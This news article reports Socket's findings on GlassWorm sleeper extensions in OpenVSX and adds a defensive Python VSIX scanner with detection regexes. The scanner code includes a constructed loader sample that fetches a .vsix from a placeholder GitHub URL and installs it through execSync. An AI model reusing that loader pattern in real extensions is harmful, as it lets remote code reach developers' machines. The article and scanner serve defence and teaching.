“This count may change as new updates continue to appear, but the pattern is consistent with earlier GlassWorm waves,” researchers at application security company Socket warned.
Socket identifies 73 "sleeper" extensions in the OpenVSX ecosystem
Socket reports a new wave of the GlassWorm campaign targeting the OpenVSX ecosystem through 73 extensions that behave as "sleepers": benign at first upload, then switching to malicious behavior after an update. Researchers say six of the extensions have already been activated and deliver malware, while they assess with high confidence that the remaining packages are either dormant or at least suspicious.
The extensions are clones of legitimate listings, designed to deceive developers who do not look past the icon and the surface description. In one documented case, the attacker reused the legitimate extension's icon and adopted similar naming and description text. The reliable distinguishing markers are the publisher name and the extension's unique identifier (the `publisher.name` pair shown on the listing and used by the editor's CLI), which a clone cannot share with the original because it is bound to the attacker's own publisher namespace.
How the sleeper extensions activate: three loading techniques
Socket found that, rather than embedding payloads in the initial upload, these extensions function as thin loaders that retrieve malicious components after installation. The company describes three primary methods observed across the cluster:
- The extension retrieves a secondary VSIX package from GitHub at runtime and installs it through the editor's command-line interface (the same path as a manual `--install-extension` invocation).
- The extension loads platform-specific compiled native addons (.node files) that contain the core logic, including fetching additional payloads and executing installation routines across the supported editors.
- Some variants rely entirely on heavily obfuscated JavaScript that decodes at runtime to fetch and install malicious extensions, sometimes including encrypted or fallback URLs for payload retrieval.
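As an added example (this is the editor's illustration, not Socket's tooling or code from the campaign), the following Python script unpacks a VSIX archive in memory and flags the three loader traits listed above: a runtime fetch of a `.vsix` from GitHub, a self-install through the editor CLI, a bundled `.node` native addon, plus generic obfuscation traces for the third variant. It also extracts the `publisher.name` identifier so it can be compared against the listing the developer meant to install. The indicator regexes, the sample loader script, the publisher `unknown-dev`, the extension name `prettier-plus` and the `example-org/example-repo` GitHub path are all constructed for illustration and are not indicators from the campaign.

```python
"""Static triage of a VSIX archive for GlassWorm-style loader indicators.

Added example; the heuristic patterns below are this editor's assumptions,
not Socket's detection rules.
"""
import io
import json
import re
import zipfile

# Each pattern maps to one of the loader techniques described in the article.
INDICATORS = {
    # technique 1: installs a fetched VSIX through the editor CLI
    "cli_install": re.compile(r"--install-extension\b"),
    # technique 1/3: pulls a .vsix from GitHub at runtime
    "github_vsix_fetch": re.compile(
        r"https?://(?:raw\.githubusercontent\.com|github\.com)/[^\s'\"]+\.vsix", re.I),
    # any technique: spawns processes to run an installer
    "child_process": re.compile(r"child_process|execSync\(|spawnSync\(|spawn\("),
    # technique 2: loads a compiled native addon that carries the real logic
    "native_module_require": re.compile(r"require\([^)]*\.node['\"]\)"),
    # technique 3: common traces of runtime-decoding obfuscation
    "obfuscation": re.compile(r"_0x[0-9a-f]{4,}|String\.fromCharCode|atob\("),
}


def scan_vsix(data: bytes) -> dict:
    """Inspect an in-memory VSIX (a zip) and return identifier, native modules and regex hits."""
    findings = {"identifier": None, "native_modules": [], "hits": {}}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name == "extension/package.json":
                pkg = json.loads(zf.read(name))
                # publisher.name is the unique ID; compare it to the listing you meant to install
                findings["identifier"] = f"{pkg.get('publisher')}.{pkg.get('name')}"
            elif name.endswith(".node"):
                findings["native_modules"].append(name)
            elif name.endswith((".js", ".cjs", ".mjs")):
                text = zf.read(name).decode("utf-8", errors="replace")
                for label, rx in INDICATORS.items():
                    if rx.search(text):
                        findings["hits"].setdefault(label, []).append(name)
    return findings


def triage(findings: dict) -> str:
    """Rough severity: a CLI self-install or a bundled native addon is the loader signature."""
    hits = findings["hits"]
    if "cli_install" in hits or findings["native_modules"] or (
            "child_process" in hits and "github_vsix_fetch" in hits):
        return "high"
    if "obfuscation" in hits or "github_vsix_fetch" in hits:
        return "medium"
    return "low"


# Constructed sample: a thin loader in the style of technique 1 plus a bundled .node addon.
# The GitHub path, file names and publisher are placeholders, not real indicators.
LOADER_JS = """
const cp = require('child_process');
const https = require('https');
const fs = require('fs');
const native = require('./native/loader.node');
const url = 'https://raw.githubusercontent.com/example-org/example-repo/main/update.vsix';
exports.activate = function () {
  https.get(url, res => {
    const out = fs.createWriteStream('/tmp/update.vsix');
    res.pipe(out).on('finish', () => {
      cp.execSync('code --install-extension /tmp/update.vsix');
      native.run();
    });
  });
};
"""

# Constructed benign counterpart: what the same listing looks like before a sleeper "wakes up".
BENIGN_JS = """
const vscode = require('vscode');
exports.activate = function () {
  vscode.window.showInformationMessage('hello from a harmless extension');
};
"""


def build_sample_vsix(loader: bool) -> bytes:
    """Build an in-memory VSIX with the constructed package.json and main script."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("extension/package.json", json.dumps({
            "name": "prettier-plus", "publisher": "unknown-dev",
            "version": "1.0.1", "main": "./extension.js"}))
        zf.writestr("extension/extension.js", LOADER_JS if loader else BENIGN_JS)
        if loader:
            zf.writestr("extension/native/loader.node", b"\x7fELF placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    for flag in (True, False):
        f = scan_vsix(build_sample_vsix(flag))
        print(f["identifier"], triage(f), sorted(f["hits"]))
```

To check a real download, pass `open(path, "rb").read()` to `scan_vsix`. A `low` result means only that these heuristics found nothing in the current version; a dormant sleeper shows exactly that before its update, which is why the same scan has to be repeated on every update rather than once at install time.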
Socket did not provide technical details about the newest payload. Previously observed GlassWorm activity targeted cryptocurrency wallet data, credentials, access tokens, SSH keys, and developer environment data.
GlassWorm's evolving strategy: benign uploads, later payloads
GlassWorm was first observed in October 2025 and initially used invisible Unicode characters to hide malicious code that stole cryptocurrency wallets and developer credentials. Since then, the campaign has expanded across multiple ecosystems, including GitHub repositories, npm packages, and both the Visual Studio Code Marketplace and OpenVSX. Researchers also observed trojanized crypto wallet clients targeting macOS users.
Earlier waves reached significant scale — a mid-March 2026 surge affected hundreds of repositories and dozens of extensions — but those large operations generated traces that multiple research teams used to block activity. The latest wave indicates the attacker is adapting tactics: submit innocuous, functioning extensions into a single ecosystem and introduce the malicious payload later via updates, rather than shipping malware in the original package.
What this means for developers, OpenVSX maintainers, and security teams
- Developers: Socket recommends that anyone who installed any of the listed extensions rotate all secrets and clean their development environment. Because the malicious capability can be introduced after installation, developers should validate publisher identity and the extension's unique identifier rather than relying solely on visuals like icons or descriptions.
- OpenVSX maintainers: The campaign underscores the risk of cloned listings and post-publish activation. Listings that mirror legitimate extensions in iconography and naming are a focal point for this wave, highlighting the need for scrutiny of publisher metadata and update behavior.
- Security teams and incident responders: The post-install activation model means defenders must monitor not only package provenance at install time but also update-time behavior and runtime fetches from external repositories such as GitHub. Socket's high-confidence assessment and the six confirmed activations provide concrete indicators to act on.
Conclusion: an adaptive supply-chain threat with continuing risk
GlassWorm's return via 73 OpenVSX "sleeper" extensions shows an attacker shifting to a lower-noise, staged approach: publish benign-looking extensions, then introduce malicious payloads later. Socket has published the full list of affected extensions and advises remediation steps for those who installed them. Because researchers previously disrupted large-scale waves by catching noisy operations early, the current tactic of delayed activation presents a different, subtler challenge — and one that will require close attention to publisher metadata, update behavior, and runtime fetches to detect and block.




